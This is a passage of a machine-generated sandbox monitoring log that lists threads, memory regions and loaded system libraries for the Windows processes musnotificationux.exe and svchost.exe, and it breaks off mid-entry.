0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Thread: id = 350 os_tid = 0x11b8 Thread: id = 351 os_tid = 0xab4 Thread: id = 352 os_tid = 0xc48 Thread: id = 353 os_tid = 0x6d0 Thread: id = 354 os_tid = 0x5c8 Thread: id = 355 os_tid = 0x5b8 Thread: id = 356 os_tid = 0xd7c Thread: id = 357 os_tid = 0x838 Thread: id = 358 os_tid = 0xe38 Thread: id = 359 os_tid = 0x89c Thread: id = 375 os_tid = 0x15c8 Thread: id = 381 os_tid = 0x2bc Thread: id = 382 os_tid = 0x1238 Thread: id = 394 os_tid = 0x1714 Thread: id = 396 os_tid = 0x1484 Process: id = "17" image_name = "musnotificationux.exe" filename = "c:\\windows\\system32\\musnotificationux.exe" page_root = "0x43a2e000" os_pid = "0x17b8" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x147c" cmd_line = "%systemroot%\\system32\\MusNotificationUx.exe ClearActiveNotifications" cur_dir = "C:\\Windows\\system32\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4224 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4225 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4226 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4227 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4228 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4229 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4230 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4231 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4232 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4233 start_va = 0x7ff7474f0000 end_va = 0x7ff74757afff monitored = 0 entry_point = 0x7ff747540a70 region_type = mapped_file name = "musnotificationux.exe" filename = "\\Windows\\System32\\MusNotificationUx.exe" (normalized: "c:\\windows\\system32\\musnotificationux.exe") Region: id = 4234 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4235 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4236 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4237 start_va = 0x400000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4238 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4239 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4240 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4241 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4242 start_va = 0xf0000 end_va = 0x1b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4243 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4244 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 4245 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4246 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4247 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4248 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4249 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4250 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4251 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4252 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4253 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4254 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4255 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4256 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4257 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4258 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4259 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 4260 start_va = 0x7fffba0f0000 end_va = 0x7fffba19efff monitored = 0 entry_point = 0x7fffba15f1c0 region_type = mapped_file name = "upshared.dll" filename = "\\Windows\\System32\\upshared.dll" (normalized: "c:\\windows\\system32\\upshared.dll") Region: id = 4261 start_va = 0x7fffbe720000 end_va = 0x7fffbe756fff monitored = 0 entry_point = 0x7fffbe73ff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 4262 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4263 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4264 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4265 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4266 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4267 start_va = 0x7fffc37f0000 end_va = 0x7fffc3818fff monitored = 0 entry_point = 0x7fffc37f9320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4268 start_va = 0x5e0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4269 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 4270 start_va = 0x660000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4271 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4272 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4273 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4274 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4275 start_va = 0x740000 end_va = 0x867fff monitored = 0 entry_point = 0x766140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4276 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 4277 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4278 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4279 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4280 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4281 start_va = 0x400000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4282 start_va = 0x660000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4283 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 4284 start_va = 0x740000 end_va = 0x884fff monitored = 0 entry_point = 0x79a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4285 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4286 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 4287 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4288 start_va = 0x7fffbadd0000 end_va = 0x7fffbae0efff monitored = 0 entry_point = 0x7fffbadf7d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 4289 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 4290 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 4291 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 4292 start_va = 0x740000 end_va = 0x884fff monitored = 0 entry_point = 0x79a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4293 start_va = 0x740000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4294 start_va = 0x7c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 4295 start_va = 0x840000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 4296 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4297 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4298 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4299 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4300 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4301 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4302 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 4303 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4304 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 4305 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4306 start_va = 0x8c0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 4307 start_va = 0x7fffc3560000 end_va = 0x7fffc3585fff monitored = 0 entry_point = 0x7fffc356ab40 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 4308 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 4309 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Thread: id = 360 os_tid = 0x169c Thread: id = 361 os_tid = 0x15cc Thread: id = 362 os_tid = 0x121c Thread: id = 363 os_tid = 0x1578 Thread: id = 364 os_tid = 0x16ac Thread: id = 365 os_tid = 0x1678 Thread: id = 366 os_tid = 0x179c Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7915000" os_pid = "0x8f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "17" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4310 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4311 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4312 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4313 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4314 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4315 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4316 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4317 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 4318 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4319 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "quiethours.dll.mui" filename = "\\Windows\\System32\\en-US\\QuietHours.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\quiethours.dll.mui") Region: id = 4320 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4321 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4322 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4323 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4324 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 4325 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 4326 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 4327 start_va = 0xa30000 end_va = 0x1e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 4328 start_va = 0x1e40000 end_va = 0x1e40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4329 start_va = 0x1e50000 end_va = 0x1e58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 4330 start_va = 0x1e60000 end_va = 0x1e60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 4331 start_va = 0x1e70000 end_va = 0x1e70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 4332 start_va = 0x1e80000 end_va = 0x1e80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4333 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 4334 start_va = 0x1fa0000 end_va = 0x1fa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 4335 start_va = 0x1fb0000 end_va = 0x1fb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fb0000" filename = "" Region: id = 4336 start_va = 0x1fc0000 end_va = 0x1fc7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "wpndatabase.db-shm" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Notifications\\wpndatabase.db-shm" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\notifications\\wpndatabase.db-shm") Region: id = 4337 start_va = 0x1fd0000 end_va = 0x1fd9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4338 start_va = 0x1fe0000 end_va = 0x1fe7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "activitiescache.db-shm" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\ConnectedDevicesPlatform\\L.OqXZRaykm\\ActivitiesCache.db-shm" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\connecteddevicesplatform\\l.oqxzraykm\\activitiescache.db-shm") Region: id = 4339 start_va = 0x1ff0000 end_va = 0x1ff3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 4340 start_va = 0x2000000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 4341 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4342 start_va = 0x2400000 end_va = 0x2411fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db") Region: id = 4343 start_va = 0x2480000 end_va = 0x24c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 4344 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "phoneutilres.dll" filename = "\\Windows\\System32\\PhoneutilRes.dll" (normalized: "c:\\windows\\system32\\phoneutilres.dll") Region: id = 4345 start_va = 0x24f0000 end_va = 0x24f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 4346 start_va = 0x2500000 end_va = 0x2837fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4347 start_va = 0x2840000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 4348 start_va = 0x2940000 end_va = 0x2a3ffff monitored = 1 entry_point = 0x0 region_type = private name = 